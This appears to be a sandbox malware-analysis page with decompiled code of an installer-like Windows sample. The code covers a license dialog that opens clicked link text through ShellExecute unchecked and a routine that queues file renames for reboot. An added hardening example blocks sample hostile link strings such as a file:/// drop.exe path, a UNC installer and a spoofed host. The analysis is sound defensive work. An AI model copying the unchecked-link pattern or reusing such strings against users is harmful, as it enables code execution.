                                                                                                  				char* _v8;
                                                                                                  				signed int _v12;
                                                                                                  				void* _v16;
                                                                                                  				struct HWND__* _t52;
                                                                                                  				long _t86;
                                                                                                  				int _t98;
                                                                                                  				struct HWND__* _t99;
                                                                                                  				signed int _t100;
                                                                                                  				intOrPtr _t107;
                                                                                                  				intOrPtr _t109;
                                                                                                  				int _t110;
                                                                                                  				signed int* _t112;
                                                                                                  				signed int _t113;
                                                                                                  				char* _t114;
                                                                                                  				CHAR* _t115;
                                                                                                  
                                                                                                  				if(_a8 != 0x110) {                                                  // 0x110 = WM_INITDIALOG
                                                                                                  					if(_a8 != 0x111) {                                              // 0x111 = WM_COMMAND
                                                                                                  						L11:
                                                                                                  						if(_a8 != 0x4e) {                                           // 0x4e = WM_NOTIFY
                                                                                                  							if(_a8 == 0x40b) {                                      // private message (WM_USER + 0xb)
                                                                                                  								 *0x79ed80 =  *0x79ed80 + 1;                        // counter that suppresses the WM_COMMAND handling below
                                                                                                  							}
                                                                                                  							L25:
                                                                                                  							_t110 = _a16;
                                                                                                  							L26:
                                                                                                  							return E00404047(_a8, _a12, _t110);                     // shared default handler
                                                                                                  						}
                                                                                                  						_t52 = GetDlgItem(_a4, 0x3e8);                              // control 1000: the RichEdit license box
                                                                                                  						_t110 = _a16;                                               // lParam = NMHDR* (ENLINK or MSGFILTER)
                                                                                                  						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {   // NMHDR.code == EN_LINK && ENLINK.msg == WM_LBUTTONDOWN
                                                                                                  							_t100 =  *((intOrPtr*)(_t110 + 0x1c));                  // ENLINK.chrg.cpMax
                                                                                                  							_t109 =  *((intOrPtr*)(_t110 + 0x18));                  // ENLINK.chrg.cpMin
                                                                                                  							_v12 = _t100;                                           // _v16/_v12/_v8 laid out as a TEXTRANGEA: cpMin, cpMax, lpstrText
                                                                                                  							_v16 = _t109;
                                                                                                  							_v8 = 0x7a1740;                                         // fixed global buffer that receives the link text
                                                                                                  							if(_t100 - _t109 < 0x800) {                             // the only guard: link text shorter than 0x800 bytes
                                                                                                  								SendMessageA(_t52, 0x44b, 0,  &_v16);               // EM_GETTEXTRANGE: copy the clicked link text to 0x7a1740
                                                                                                  								SetCursor(LoadCursorA(0, 0x7f02));                  // IDC_WAIT
                                                                                                  								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);           // opens the link text as-is (SW_SHOWNORMAL); no scheme check
                                                                                                  								SetCursor(LoadCursorA(0, 0x7f00));                  // IDC_ARROW
                                                                                                  								_t110 = _a16;
                                                                                                  							}
                                                                                                  						}
                                                                                                  						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {   // not (EN_MSGFILTER with MSGFILTER.msg == WM_KEYDOWN)
                                                                                                  							goto L26;
                                                                                                  						} else {
                                                                                                  							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {              // MSGFILTER.wParam == VK_RETURN
                                                                                                  								SendMessageA( *0x7a27a8, 0x111, 1, 0);              // WM_COMMAND, IDOK, to the outer window stored at 0x7a27a8
                                                                                                  							}
                                                                                                  							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {             // VK_ESCAPE
                                                                                                  								SendMessageA( *0x7a27a8, 0x10, 0, 0);               // WM_CLOSE
                                                                                                  							}
                                                                                                  							return 1;
                                                                                                  						}
                                                                                                  					}
                                                                                                  					if(_a12 >> 0x10 != 0 ||  *0x79ed80 != 0) {                      // HIWORD(wParam) != BN_CLICKED, or handling suppressed
                                                                                                  						goto L25;
                                                                                                  					} else {
                                                                                                  						_t112 =  *0x79e570 + 0x14;                                  // flags word of the current page record
                                                                                                  						if(( *_t112 & 0x00000020) == 0) {
                                                                                                  							goto L25;
                                                                                                  						}
                                                                                                  						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;   // BM_GETCHECK on button 0x40a, stored in bit 0 ("accepted")
                                                                                                  						E00404002(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);   // called with the checked state (enables/disables navigation, by its use here)
                                                                                                  						E004043B3();
                                                                                                  						goto L11;
                                                                                                  					}
                                                                                                  				}
                                                                                                  				// WM_INITDIALOG: lParam is the page record
                                                                                                  				_t98 = _a16;
                                                                                                  				_t113 =  *(_t98 + 0x30);                                            // license text string id
                                                                                                  				if(_t113 < 0) {
                                                                                                  					_t107 =  *0x7a1f7c; // 0x891203
                                                                                                  					_t113 =  *(_t107 - 4 + _t113 * 4);                              // negative id: resolve through a language string table
                                                                                                  				}
                                                                                                  				_push( *((intOrPtr*)(_t98 + 0x34)));
                                                                                                  				_t114 = _t113 +  *0x7a27d8;                                         // pointer into the string block
                                                                                                  				_push(0x22);
                                                                                                  				_a16 =  *_t114;                                                     // first byte: stream format passed to EM_STREAMIN below (SF_TEXT = 1, SF_RTF = 2)
                                                                                                  				_v12 = _v12 & 0x00000000;                                           // _v16/_v12/_v8 now laid out as an EDITSTREAM: dwCookie, dwError, pfnCallback
                                                                                                  				_t115 = _t114 + 1;                                                  // license text follows the format byte
                                                                                                  				_v16 = _t115;
                                                                                                  				_v8 = E004040F4;                                                    // EDITSTREAM callback
                                                                                                  				E00403FE0(_a4);                                                     // takes the pushed string id and control id 0x22
                                                                                                  				_push( *((intOrPtr*)(_t98 + 0x38)));
                                                                                                  				_push(0x23);
                                                                                                  				E00403FE0(_a4);                                                     // same for control id 0x23
                                                                                                  				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);   // BST_CHECKED on 0x40a or 0x40b from bits 0 and 5 of the page flags
                                                                                                  				E00404002( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                                                                                  				_t99 = GetDlgItem(_a4, 0x3e8);                                      // the RichEdit license box again
                                                                                                  				E00404015(_t99);
                                                                                                  				SendMessageA(_t99, 0x45b, 1, 0);                                    // EM_AUTOURLDETECT on: this is what makes URL-like license text clickable
                                                                                                  				_t86 =  *( *0x7a27b0 + 0x68);
                                                                                                  				if(_t86 < 0) {
                                                                                                  					_t86 = GetSysColor( ~_t86);                                     // negative value encodes a COLOR_* index
                                                                                                  				}
                                                                                                  				SendMessageA(_t99, 0x443, 0, _t86);                                 // EM_SETBKGNDCOLOR
                                                                                                  				SendMessageA(_t99, 0x445, 0, 0x4010000);                            // EM_SETEVENTMASK = ENM_LINK | ENM_KEYEVENTS, so EN_LINK and EN_MSGFILTER reach the WM_NOTIFY branch
                                                                                                  				 *0x79dd64 =  *0x79dd64 & 0x00000000;                               // global cleared before streaming starts
                                                                                                  				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));                      // EM_EXLIMITTEXT to the license length
                                                                                                  				SendMessageA(_t99, 0x449, _a16,  &_v16);                            // EM_STREAMIN(format, &EDITSTREAM)
                                                                                                  				 *0x79ed80 =  *0x79ed80 & 0x00000000;                               // reset the WM_COMMAND suppression counter
                                                                                                  				return 0;
                                                                                                  			}
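                                                                                                  The EN_LINK branch of E00404128 above copies the clicked link text out of the RichEdit control with EM_GETTEXTRANGE and passes it straight to ShellExecuteA("open"); the only guard is the length bound cpMax - cpMin < 0x800, and EM_AUTOURLDETECT is switched on at init, so any prefix RichEdit auto-links (file:, mailto: and ftp: among them, not just http) is handed to the shell verb handler. The block below is an added example written for this page, not code from the sample or from the report: a scheme and host allow-list for link text, with a hardened counterpart of that branch compiled only under _WIN32. LINK_MAX mirrors the 0x800 bound from the decompiled code; the handler name on_en_link_click and the sample link strings are assumptions made for the example.

```c
/* Added example (not the sample's code): validate link text before it reaches
 * the shell. The portable part compiles anywhere; the dialog hook is Windows-only. */
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#ifdef _WIN32
#include <windows.h>
#include <richedit.h>
#include <shellapi.h>
#endif

/* Mirrors the only bound the decompiled handler applies: cpMax - cpMin < 0x800. */
#define LINK_MAX 0x800

/* Case-insensitive prefix test; URL schemes are case-insensitive. */
static int has_prefix_ci(const char *s, size_t len, const char *prefix)
{
    size_t plen = strlen(prefix);
    if (len < plen) return 0;
    for (size_t i = 0; i < plen; i++) {
        if (tolower((unsigned char)s[i]) != tolower((unsigned char)prefix[i])) return 0;
    }
    return 1;
}

/* Returns 1 if text[0..len) is an http(s) URL with a plain ASCII host, else 0.
 * Everything else RichEdit may auto-link (file:, mailto:, ftp:, UNC paths,
 * bare "www." text) is rejected, as are hosts carrying user-info ('@'). */
int link_is_allowed(const char *text, size_t len)
{
    if (text == NULL || len == 0 || len >= LINK_MAX) return 0;

    /* No control characters, whitespace, quotes or backslashes: a NUL would
     * truncate what ShellExecute sees, the rest never belong in a URL. */
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)text[i];
        if (c <= 0x20 || c == 0x7f || c == '\\' || c == '"') return 0;
    }

    size_t pos;
    if (has_prefix_ci(text, len, "https://"))     pos = 8;
    else if (has_prefix_ci(text, len, "http://")) pos = 7;
    else return 0;

    /* Host runs up to the first '/', '?' or '#'. It must be non-empty and may
     * contain only alphanumerics, '.', '-' and ':' (port). Non-ASCII hosts are
     * rejected too; convert them to punycode before they get here. */
    size_t host_len = 0;
    for (; pos < len && text[pos] != '/' && text[pos] != '?' && text[pos] != '#'; pos++) {
        unsigned char c = (unsigned char)text[pos];
        if (!(isalnum(c) || c == '.' || c == '-' || c == ':')) return 0;
        host_len++;
    }
    return host_len > 0;
}

#ifdef _WIN32
/* Hardened counterpart of the EN_LINK branch in E00404128 (name assumed).
 * Same flow as the decompiled code, EM_GETTEXTRANGE then ShellExecuteA("open"),
 * but the text must pass link_is_allowed() first. */
static void on_en_link_click(HWND dlg, HWND edit, const ENLINK *link)
{
    char buf[LINK_MAX];
    TEXTRANGEA tr;
    LONG n;

    if (link->msg != WM_LBUTTONDOWN) return;
    n = link->chrg.cpMax - link->chrg.cpMin;
    if (n <= 0 || n >= LINK_MAX) return;        /* same bound as the sample */

    tr.chrg = link->chrg;
    tr.lpstrText = buf;
    SendMessageA(edit, EM_GETTEXTRANGE, 0, (LPARAM)&tr);
    buf[n] = '\0';

    if (!link_is_allowed(buf, strlen(buf))) return;   /* the added check */
    ShellExecuteA(dlg, "open", buf, NULL, NULL, SW_SHOWNORMAL);
}
#endif

/* Stand-alone demo over constructed link texts (not taken from the sample). */
int main(void)
{
    static const char *const samples[] = {
        "https://example.com/license",
        "HTTP://example.com:8080/eula.txt",
        "file:///C:/Users/Public/drop.exe",
        "\\\\fileserver\\share\\setup.exe",
        "mailto:someone@example.com",
        "https://evil.example@good.example/",
        "www.example.com",
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        printf("%-40s %s\n", samples[i],
               link_is_allowed(samples[i], strlen(samples[i])) ? "open" : "blocked");
    }
    return 0;
}
```

                                                                                                  The allow-list is deliberately narrow: the shell verb "open" dispatches on whatever the string resolves to (a file type association for a local path or UNC path, a protocol handler for any registered scheme), so rejecting everything but a plain http(s) URL with an ASCII host is the safe default for text that came from an installer's license resource.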

                                                                                                  0x00404138 0x0040425e 0x004042ba 0x004042be 0x00404395 0x00404397 0x00404397 0x0040439d
                                                                                                  0x0040439d 0x004043a0 0x00000000 0x004043a7 0x004042cc 0x004042ce 0x004042d8 0x004042e3
                                                                                                  0x004042e6 0x004042e9 0x004042f4 0x004042f7 0x004042fe 0x0040430c 0x00404324 0x00404337
                                                                                                  0x00404347 0x00404349 0x00404349 0x004042fe 0x00404353 0x00000000 0x0040435e 0x00404362
                                                                                                  0x00404373 0x00404373 0x00404379 0x00404387 0x00404387 0x00000000 0x0040438b 0x00404353
                                                                                                  0x00404269 0x00000000 0x0040427d
                                                                                                  0x00404283
                                                                                                  0x00404289
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x004042ae
                                                                                                  0x004042b0
                                                                                                  0x004042b5
                                                                                                  0x00000000
                                                                                                  0x004042b5
                                                                                                  0x00404269
                                                                                                  0x0040413e
                                                                                                  0x00404141
                                                                                                  0x00404146
                                                                                                  0x00404148
                                                                                                  0x00404157
                                                                                                  0x00404157
                                                                                                  0x0040415e
                                                                                                  0x00404161
                                                                                                  0x00404163
                                                                                                  0x00404168
                                                                                                  0x00404171
                                                                                                  0x00404177
                                                                                                  0x00404183
                                                                                                  0x00404186
                                                                                                  0x0040418f
                                                                                                  0x00404194
                                                                                                  0x00404197
                                                                                                  0x0040419c
                                                                                                  0x004041b3
                                                                                                  0x004041ba
                                                                                                  0x004041cd
                                                                                                  0x004041d0
                                                                                                  0x004041e5
                                                                                                  0x004041ec
                                                                                                  0x004041f1
                                                                                                  0x004041f6
                                                                                                  0x004041f6
                                                                                                  0x00404205
                                                                                                  0x00404214
                                                                                                  0x00404216
                                                                                                  0x0040422c
                                                                                                  0x0040423b
                                                                                                  0x0040423d
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                  • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004041B3
                                                                                                  • GetDlgItem.USER32 ref: 004041C7
                                                                                                  • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004041E5
                                                                                                  • GetSysColor.USER32(?), ref: 004041F6
                                                                                                  • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404205
                                                                                                  • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404214
                                                                                                  • lstrlenA.KERNEL32(?), ref: 0040421E
                                                                                                  • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040422C
                                                                                                  • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040423B
                                                                                                  • GetDlgItem.USER32 ref: 0040429E
                                                                                                  • SendMessageA.USER32(00000000), ref: 004042A1
                                                                                                  • GetDlgItem.USER32 ref: 004042CC
                                                                                                  • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040430C
                                                                                                  • LoadCursorA.USER32 ref: 0040431B
                                                                                                  • SetCursor.USER32(00000000), ref: 00404324
                                                                                                  • ShellExecuteA.SHELL32(0000070B,open,007A1740,00000000,00000000,00000001), ref: 00404337
                                                                                                  • LoadCursorA.USER32 ref: 00404344
                                                                                                  • SetCursor.USER32(00000000), ref: 00404347
                                                                                                  • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404373
                                                                                                  • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404387
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                  • String ID: HfkcdoekxlzOjbt$N$open
                                                                                                  • API String ID: 3615053054-4167511373
                                                                                                  • Opcode ID: d22ed51e52645bbda46709527d00024517d84b0f423467f554ab8d343295d58a
                                                                                                  • Instruction ID: f0cb6d18f97b8649cf6ac89defab68cba8f06c9b906ac7d17723c3c6284b924c
                                                                                                  • Opcode Fuzzy Hash: d22ed51e52645bbda46709527d00024517d84b0f423467f554ab8d343295d58a
                                                                                                  • Instruction Fuzzy Hash: 7B6192B1A40309BFEB109F60DC45F6A7B69FB84715F108026FB05BB2D1C7B8A9518F99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 90%
                                                                                                  			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                                                  				struct tagLOGBRUSH _v16;
                                                                                                  				struct tagRECT _v32;
                                                                                                  				struct tagPAINTSTRUCT _v96;
                                                                                                  				struct HDC__* _t70;
                                                                                                  				struct HBRUSH__* _t87;
                                                                                                  				struct HFONT__* _t94;
                                                                                                  				long _t102;
                                                                                                  				signed int _t126;
                                                                                                  				struct HDC__* _t128;
                                                                                                  				intOrPtr _t130;
                                                                                                  
                                                                                                  				if(_a8 == 0xf) {
                                                                                                  					_t130 =  *0x7a27b0;
                                                                                                  					_t70 = BeginPaint(_a4,  &_v96);
                                                                                                  					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                                                  					_a8 = _t70;
                                                                                                  					GetClientRect(_a4,  &_v32);
                                                                                                  					_t126 = _v32.bottom;
                                                                                                  					_v32.bottom = _v32.bottom & 0x00000000;
                                                                                                  					while(_v32.top < _t126) {
                                                                                                  						_a12 = _t126 - _v32.top;
                                                                                                  						asm("cdq");
                                                                                                  						asm("cdq");
                                                                                                  						asm("cdq");
                                                                                                  						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                                                  						_t87 = CreateBrushIndirect( &_v16);
                                                                                                  						_v32.bottom = _v32.bottom + 4;
                                                                                                  						_a16 = _t87;
                                                                                                  						FillRect(_a8,  &_v32, _t87);
                                                                                                  						DeleteObject(_a16);
                                                                                                  						_v32.top = _v32.top + 4;
                                                                                                  					}
                                                                                                  					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                                                  						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                                                                                  						_a16 = _t94;
                                                                                                  						if(_t94 != 0) {
                                                                                                  							_t128 = _a8;
                                                                                                  							_v32.left = 0x10;
                                                                                                  							_v32.top = 8;
                                                                                                  							SetBkMode(_t128, 1);
                                                                                                  							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                                                  							_a8 = SelectObject(_t128, _a16);
                                                                                                  							DrawTextA(_t128, 0x7a1fa0, 0xffffffff,  &_v32, 0x820);
                                                                                                  							SelectObject(_t128, _a8);
                                                                                                  							DeleteObject(_a16);
                                                                                                  						}
                                                                                                  					}
                                                                                                  					EndPaint(_a4,  &_v96);
                                                                                                  					return 0;
                                                                                                  				}
                                                                                                  				_t102 = _a16;
                                                                                                  				if(_a8 == 0x46) {
                                                                                                  					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                                                  					 *((intOrPtr*)(_t102 + 4)) =  *0x7a27a8;
                                                                                                  				}
                                                                                                  				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                                                                                  			}
                                                                                                  Address column of the decompiled listing of E00401000 above (one entry per line, 0x0040100a to 0x00401178, zero entries for lines without an address; the per-line mapping was lost in extraction)

                                                                                                  APIs
                                                                                                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                  • GetClientRect.USER32 ref: 0040105B
                                                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                  • FillRect.USER32 ref: 004010E4
                                                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                  • DrawTextA.USER32(00000000,007A1FA0,000000FF,00000010,00000820), ref: 00401156
                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                  • String ID: F
                                                                                                  • API String ID: 941294808-1304234792
                                                                                                  • Opcode ID: 801c52bb82e7a0127a4a406d0340a402cf5ff0aaf0876ab62d5db8722a7a1795
                                                                                                  • Instruction ID: ae539154b4ab0852a88358bcfa6a2a72370d892ddcdfd4a8f95fd444cc6c7b46
                                                                                                  • Opcode Fuzzy Hash: 801c52bb82e7a0127a4a406d0340a402cf5ff0aaf0876ab62d5db8722a7a1795
                                                                                                  • Instruction Fuzzy Hash: 4241AC71804249AFCB058F94CD459BFBFB9FF45314F00802AF961AA2A0C738EA50DFA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 93%
                                                                                                   			E00405A72(void* __eflags) {                     // arg at _t55+0x1c: existing file name; arg at _t55+0x18: new name, or NULL for "delete"
                                                                                                   				void* __ebx;
                                                                                                   				void* __edi;
                                                                                                   				void* __esi;
                                                                                                   				intOrPtr* _t15;
                                                                                                   				long _t16;
                                                                                                   				int _t20;
                                                                                                   				void* _t28;
                                                                                                   				long _t29;
                                                                                                   				intOrPtr* _t37;
                                                                                                   				int _t43;
                                                                                                   				void* _t44;
                                                                                                   				long _t47;
                                                                                                   				CHAR* _t49;
                                                                                                   				void* _t51;
                                                                                                   				void* _t53;
                                                                                                   				intOrPtr* _t54;
                                                                                                   				void* _t55;
                                                                                                   				void* _t56;
                                                                                                   
                                                                                                   				_t15 = E004060B4(2);                                  // resolve an import by table index (subcall: GetModuleHandleA + GetProcAddress, see APIs below)
                                                                                                   				_t49 =  *(_t55 + 0x18);                               // new name; NULL means the existing file is to be deleted
                                                                                                   				if(_t15 != 0) {
                                                                                                   					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);          // (existing, new, 5): 5 == MOVEFILE_REPLACE_EXISTING|MOVEFILE_DELAY_UNTIL_REBOOT, consistent with a MoveFileExA call
                                                                                                   					if(_t20 != 0) {
                                                                                                   						L16:
                                                                                                   						 *0x7a2830 =  *0x7a2830 + 1;                   // global counter incremented on every exit except the GetShortPathNameA failures below: a reboot-pending flag
                                                                                                   						return _t20;
                                                                                                   					}
                                                                                                   				}
                                                                                                   				 *0x7a0f30 = 0x4c554e;                                // bytes 4E 55 4C 00 == "NUL": the default destination when no new name is given
                                                                                                   				if(_t49 == 0) {
                                                                                                   					L5:
                                                                                                   					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x7a09a8, 0x400);   // 8.3 short path of the existing file into 0x7a09a8
                                                                                                   					if(_t16 != 0 && _t16 <= 0x400) {
                                                                                                   						_t43 = wsprintfA(0x7a05a8, "%s=%s\r\n", 0x7a0f30, 0x7a09a8);   // rename line "<new|NUL>=<existing>\r\n" at 0x7a05a8; _t43 = its length
                                                                                                   						_t56 = _t55 + 0x10;
                                                                                                   						E00405D46(_t43, 0x400, 0x7a09a8, 0x7a09a8,  *((intOrPtr*)( *0x7a27b0 + 0x128)));   // fills 0x7a09a8 with the path of the ini file to edit (string source not shown here)
                                                                                                   						_t20 = E004059FB(0x7a09a8, 0xc0000000, 4);   // open helper: 0xc0000000 == GENERIC_READ|GENERIC_WRITE, 4 == OPEN_ALWAYS
                                                                                                   						_t53 = _t20;
                                                                                                   						 *(_t56 + 0x14) = _t53;
                                                                                                   						if(_t53 == 0xffffffff) {                      // INVALID_HANDLE_VALUE
                                                                                                   							goto L16;
                                                                                                   						}
                                                                                                   						_t47 = GetFileSize(_t53, 0);
                                                                                                   						_t7 = _t43 + 0xa; // 0xa == strlen("[Rename]\r\n")
                                                                                                   						_t51 = GlobalAlloc(0x40, _t47 + _t7);         // 0x40 == GMEM_FIXED|GMEM_ZEROINIT (GPTR): room for file + rename line + section header
                                                                                                   						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {   // the whole file must be read
                                                                                                   							L15:
                                                                                                   							_t20 = CloseHandle(_t53);
                                                                                                   							goto L16;
                                                                                                   						} else {
                                                                                                   							if(E00405970(_t51, "[Rename]\r\n") != 0) {           // strstr-like search (subcall uses lstrlenA) for the section header
                                                                                                   								_t28 = E00405970(_t26 + 0xa, 0x409404);            // _t26: the match just found (temporary left unbound by the decompiler); search past the header for the string at 0x409404 (not shown on this page)
                                                                                                   								if(_t28 == 0) {
                                                                                                   									L13:
                                                                                                   									_t29 = _t47;                                   // section is last, or was just appended: insert at end of data
                                                                                                   									L14:
                                                                                                   									E004059BC(_t51 + _t29, 0x7a05a8, _t43);        // memcpy-like: rename line into the buffer at offset _t29
                                                                                                   									SetFilePointer(_t53, 0, 0, 0);                 // FILE_BEGIN
                                                                                                   									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);   // rewrite the whole file
                                                                                                   									GlobalFree(_t51);
                                                                                                   									goto L15;
                                                                                                   								}
                                                                                                   								_t37 = _t28 + 1;                                   // insertion point: one byte past the second match
                                                                                                   								_t44 = _t51 + _t47;                                // end of file data
                                                                                                   								_t54 = _t37;
                                                                                                   								if(_t37 >= _t44) {
                                                                                                   									L21:
                                                                                                   									_t53 =  *(_t56 + 0x14);
                                                                                                   									_t29 = _t37 - _t51;                            // insertion offset
                                                                                                   									goto L14;
                                                                                                   								} else {
                                                                                                   									goto L20;
                                                                                                   								}
                                                                                                   								do {
                                                                                                   									L20:
                                                                                                   									 *((char*)(_t43 + _t54)) =  *_t54;             // shift the tail forward by _t43 bytes, one byte at a time, low address to high
                                                                                                   									_t54 = _t54 + 1;
                                                                                                   								} while (_t54 < _t44);
                                                                                                   								goto L21;
                                                                                                   							}
                                                                                                   							E00405D24(_t51 + _t47, "[Rename]\r\n");   // strcpy-like: append the section header
                                                                                                   							_t47 = _t47 + 0xa;
                                                                                                   							goto L13;
                                                                                                   						}
                                                                                                   					}
                                                                                                   				} else {
                                                                                                   					CloseHandle(E004059FB(_t49, 0, 1));              // 1 == CREATE_NEW: create the new-name file if absent so that GetShortPathNameA can resolve it
                                                                                                   					_t16 = GetShortPathNameA(_t49, 0x7a0f30, 0x400);   // short path of the new name overwrites the "NUL" default
                                                                                                   					if(_t16 != 0 && _t16 <= 0x400) {
                                                                                                   						goto L5;
                                                                                                   					}
                                                                                                   				}
                                                                                                   				return _t16;
                                                                                                   			}
                                                                                                   (Per-line instruction address column of the side-by-side view for E00405A72, spilled out of layout by extraction; the addresses run from 0x00405a78 to 0x00405c07.)

                                                                                                  APIs
                                                                                                    • Part of subcall function 004060B4: GetModuleHandleA.KERNEL32(?,?,?,004032D9,0000000D), ref: 004060C6
                                                                                                    • Part of subcall function 004060B4: GetProcAddress.KERNEL32(00000000,?), ref: 004060E1
                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000002,?,00000000,?,?,00405807,?,00000000,000000F1,?), ref: 00405ABF
                                                                                                  • GetShortPathNameA.KERNEL32 ref: 00405AC8
                                                                                                  • GetShortPathNameA.KERNEL32 ref: 00405AE5
                                                                                                  • wsprintfA.USER32 ref: 00405B03
                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,007A09A8,C0000000,00000004,007A09A8,?,?,?,00000000,000000F1,?), ref: 00405B3E
                                                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405B4D
                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 00405B63
                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,007A05A8,00000000,-0000000A,00409404,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405BA9
                                                                                                  • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405BBB
                                                                                                  • GlobalFree.KERNEL32 ref: 00405BC2
                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405BC9
                                                                                                    • Part of subcall function 00405970: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405B7E,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405977
